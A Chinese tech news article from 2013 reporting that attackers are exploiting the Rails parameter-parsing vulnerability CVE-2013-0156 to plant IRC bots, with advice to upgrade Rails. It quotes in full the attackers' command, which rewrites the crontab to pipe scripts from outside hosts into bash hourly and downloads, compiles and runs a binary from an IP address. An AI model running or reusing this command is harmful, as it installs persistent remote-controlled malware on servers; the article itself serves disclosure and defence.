阅读更多

1顶
0踩

编程语言

原创新闻 Rails 老漏洞仍在肆虐,请尽快升级

2013-05-30 12:46 by 副主编 wangguo 评论(4) 有10346人浏览
安全专家Jarmoc在博客中称,过去几天,一些基于Rails的Web应用程序和服务器遭到了攻击,攻击者成功入侵后,会在服务器上安装一个机器人,以接受来自IRC频道的进一步指示。

攻击者利用的是CVE-2013-0156这个安全漏洞,尽管Rails团队已经在今年1月份修复了该漏洞,但目前还有大量的服务器未更新至最新的版本,使得攻击者有机可乘。

该漏洞存在于Action Pack模块的参数解析代码中,允许攻击者绕过认证系统,注入并执行任意SQL代码,或对Rails应用执行DoS攻击。新的Rails版本中已经修复了该漏洞。

攻击者试图在crontab中添加如下命令(现在该命令已不可用):

crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget  -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k


该命令执行后会下载名为cmd1、cmd2和cmd3的可执行文件,并下载一个名为k.c的C源码文件到/tmp目录中,使用系统的GCC编译执行。或许是为了防止编译失败,该条命令还将下载一个预编译的k版本。

Jarmoc在博客中公布了k.c的源码,感兴趣的开发者可点击这里

目前最新的Rails版本为3.2.13、3.1.12和2.3.18,建议开发者尽快升级。

Via jarmoc
1
0
评论 共 4 条 请登录后发表评论
4 楼 wujingtianze 2013-06-05 09:43
redis?
3 楼 it90ceo 2013-06-02 09:36
支持下。。。
2 楼 lection.yu 2013-05-31 10:53
黑客高人真多。。
1 楼 7y4z2008 2013-05-31 08:43
地下0day市场更多

发表评论

您还没有登录,请您登录后再发表评论

相关推荐

  • java数据透视表_使用java如何操作excel数据透视表

    支持楼上,jxl可以。... int getNumberOfSheets()获得工作薄(Workbook)中工作表(Sheet)的个数,示例:jxl.Workbook rwb = jxl.Workbook.getWorkbook(new File(sourcefile));int sheets = rwb.getNumberOfSheets...

  • java数据透视表_Java 创建 Excel 数据透视表

    Excel 数据透视表具有强大的...本文将介绍如何在Java应用程序中创建Excel数据透视表及设置透视表的格式。Jar文件导入方法方法一:下载最新的 Free Spire. XLS for Java 包并解压缩 , 然后从lib文件夹下, 将 Spir...

  • java excel 透视_在Java中用Excel创建数据透视表和数据透视图

    当您需要快速分析Excel工作表中的数据并查看数据中的比较,...在本文中,我将介绍如何使用Free Spire.XLS for Java API在Java中的Excel文件中创建数据透视表和数据透视图。添加依赖项首先,您需要添加所需的依赖项,...

  • java 数据透视表 组件_Java创建Excel数据透视表

    正版现货excel效率手册早做完不锡22.82元包邮(需用券)去购买 >Excel 数据透视表具有强大的数据...本文将介绍如何在Java应用程序中创建Excel数据透视表及设置透视表的格式。使用工具: Free Spire. XLS for Java (...

  • java excel 透视_Java Excel透视表相关操作实现代码

    概述透视表是依据已有数据源来创建的交互式表格,我们可在excel中创建透视表,也可编辑已有透视表。所需工具:Free Spire.XLS for Java免费版,编辑代码前,先下载导入jar到Java程序(可手动下载导入,或通过Maven...

  • 如何使用Java以编程方式在Excel中创建数据透视表?

    Excel电子表格中的数据透视表用于以交互方式汇总数据。假设在工作表中有许多发票...为了使用Excel数据透视表,我们将使用Aspose.Cells for Java,它是一个功能强大的API,可让您从Java应用程序内部生成,修改和转换Exc

  • java数据透视表算法_用Java Steams创建数据透视表

    【51CTO.com快译】这次让我们来看看如何使用Java 8 Streams(流)来实现一张数据透视表。通常情况下,原始数据本身一般并不容易被人们所读懂,因此我们需要进行一些数据聚合操作来辨别出原始数据中的各种规律模式。而...

  • java excel 透视_java基于poi导出excel透视表代码实例

    这篇文章主要介绍了java基于poi导出excel透视表代码实例,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下从前,我是一个前端程序猿,怀着对打通任(前)督(后)二...

  • java excel 透视_JAVA操作Excel创建透视表

    Free Spire.XLS for Java,作者使用的是免费版。可去官网下载Jar包后解压,将解压后lib文件夹下的Spire.Xls.jar手动导入到Java程序;或者通过Maven仓库下载导入。JAVA程序代码如下importcom.sp...

  • java poi 数据透视,Apache的POI:Excel数据透视表 - 行标签

    I have a requirement to create a excel sheet in JAVA as below :I am not able to create a row label with multiple columns side by side ( menus and submenus filter ).Instead of displaying the submenu in...

  • 手把手教你如何在Java在Excel中进行数据分析

    前一段时间淘宝出了一个“淘宝人生”的模块,可以看从注册淘宝账号至今的消费记录,仔细想了想,现在微信、淘宝这些APP好像都喜欢出这种记录使用者的支付、消费情况的功能。

  • excel 宏 数据透视表_宏从多个文件创建Excel数据透视表

    excel 宏 数据透视表 宏从多个文件创建Excel数据透视表 (Macro Creates Excel Pivot Table From Multiple Files) If you want to create a pivot table from data on different worksheets, you can use a Multiple ...

  • excel数据透视表_Excel数据透视表排序问题

    excel数据透视表 Excel数据透视表排序问题 (Excel Pivot Table Sorting Problems) Usually, it's easy to sort an Excel pivot table – just click the drop down arrow in a pivot table heading, and select one ...

  • excel数据透视表_Excel数据透视表选择快速提示

    excel数据透视表 Excel数据透视表选择快速提示 (Excel Pivot Table Selection Quick Tip)To format a pivot table, you can select a specific section, such as one of the fields, or a grand total. When you ...

  • java excel 透视,Java开源库生成数据透视表excel

    Given an excel file I want to generate a pivot table programmatically. I have heard of Aspose.Cells but it is paid version. Can someone suggest some open source libraries similar to Aspose.Cells or at...

  • java刷新透视表数据源,Java 创建、刷新Excel透视表/设置透视表行折叠、展开

    Java 创建、刷新Excel透视表/设置透视表行折叠、展开透视表是依据已有数据源来创建的交互式表格,我们可在excel中创建透视表,也可编辑已有透视表。本文以创建透视表、刷新透视表以及设置透视表的行展开或折叠为例,...

  • 三菱FX3G FX3S与四台E700变频器Modbus RTU通讯控制:正反转、频率设定与读取方案,三菱FX3G FX3S与四台E700变频器通讯:Modbus RTU协议实现正反转、频率设定与控制

    三菱FX3G FX3S与四台E700变频器Modbus RTU通讯控制:正反转、频率设定与读取方案,三菱FX3G FX3S与四台E700变频器通讯:Modbus RTU协议实现正反转、频率设定与控制,快速反馈与教程包含,三菱FX3G FX3S 485协议通讯四台三菱E700变频器程序资料 三菱FX3G FX3S+485bd扩展,采用modbus rtu协议,crc校验,通讯控制四台E700变频器,可以实现正反转,停止,频率的设定,频率,电流等的读取。 反馈快,使用方便,包括教程,plc和触摸屏程序,变频器参数设置和接线,别的变频器支持rtu协议也可以实现。 ,三菱FX系列PLC; 485协议通讯; 变频器E700; 通讯控制; 参数设置; 教程。,三菱PLC控制E700变频器:485协议通讯与程序设置全解

  • hyphen-nl-0.20050617-10.el7.x64-86.rpm.tar.gz

    1、文件内容:hyphen-nl-0.20050617-10.el7.rpm以及相关依赖 2、文件形式:tar.gz压缩包 3、安装指令: #Step1、解压 tar -zxvf /mnt/data/output/hyphen-nl-0.20050617-10.el7.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm 4、更多资源/技术支持:公众号禅静编程坊

  • 西门子S7-1200PLC结构化编程在5轴伺服项目中的应用:模块化设计、触摸屏控制及电气图纸实战解析,西门子S7-1200PLC结构化编程实现多轴联动与多种伺服功能应用:CAD图纸、PLC程序和触摸屏

    西门子S7-1200PLC结构化编程在5轴伺服项目中的应用:模块化设计、触摸屏控制及电气图纸实战解析,西门子S7-1200PLC结构化编程实现多轴联动与多种伺服功能应用:CAD图纸、PLC程序和触摸屏程序协同运作。,西门子S7-1200PLC结构化编程5轴伺服项目 ,包含plc程序、威纶通触摸屏程序、cad电气图纸。 可以实现以下功能,规格有: 1.三轴机械手X轴-Y轴-Z轴联动取放料PTO脉冲定位控制台达B2伺服 2.台达伺服速度模式应用+扭矩模式应用实现收放卷 3.程序为结构化编程,每一功能为模块化设计,功能:自动_手动_单步_暂停后原位置继续运行_轴断电保持_报警功能_气缸运行及报警. 4.每个功能块可以无数次重复调用,可以建成库,用时调出即可 5.上位机采样威纶通触摸屏 6.参考本案例熟悉掌握结构化编程技巧,扩展逻辑思维。 博图14以上都可以打开 ,核心关键词:西门子S7-1200PLC; 结构化编程; 5轴伺服项目; PLC程序; 威纶通触摸屏程序; CAD电气图纸; 三轴机械手; PTO脉冲定位控制; 台达B2伺服; 速度模式应用; 扭矩模式应用; 模块化设计; 轴断电保

  • 情感分析算法的关键应用领域与典型实战案例

    情感分析算法在多个领域有着广泛的应用场景和丰富的案例

Global site tag (gtag.js) - Google Analytics